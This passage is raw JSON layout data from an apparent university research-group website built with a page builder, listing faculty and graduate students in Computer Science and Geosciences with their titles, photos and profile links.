Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c195\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c196\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1636,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":2,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":1,\"id\":\"182-c199\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c195\",\"index\":1,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c60\",\"parentId\":\"182-c59\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c59\",\"parentId\":\"182-c58\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c58\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c63\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c63\",\"index\":0,\"id\":\"182-c64\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sundos_Al_Subhi-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1592,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c63\",\"index\":0,\"id\":\"182-c65\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c63\",\"index\":2,\"id\":\"182-c66\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c63\",\"index\":3,\"id\":\"182-c67\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c63\",\"index\":1,\"id\":\"182-c68\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c79\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/anupam.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1624,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c81\",\"index\":3,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c99\",\"index\":1,\"id\":\"182-c104\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c105\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c105\",\"index\":2,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c105\",\"index\":3,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c105\",\"index\":1,\"id\":\"182-c110\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c111\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c111\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c111\",\"index\":0,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c111\",\"index\":2,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c111\",\"index\":3,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s 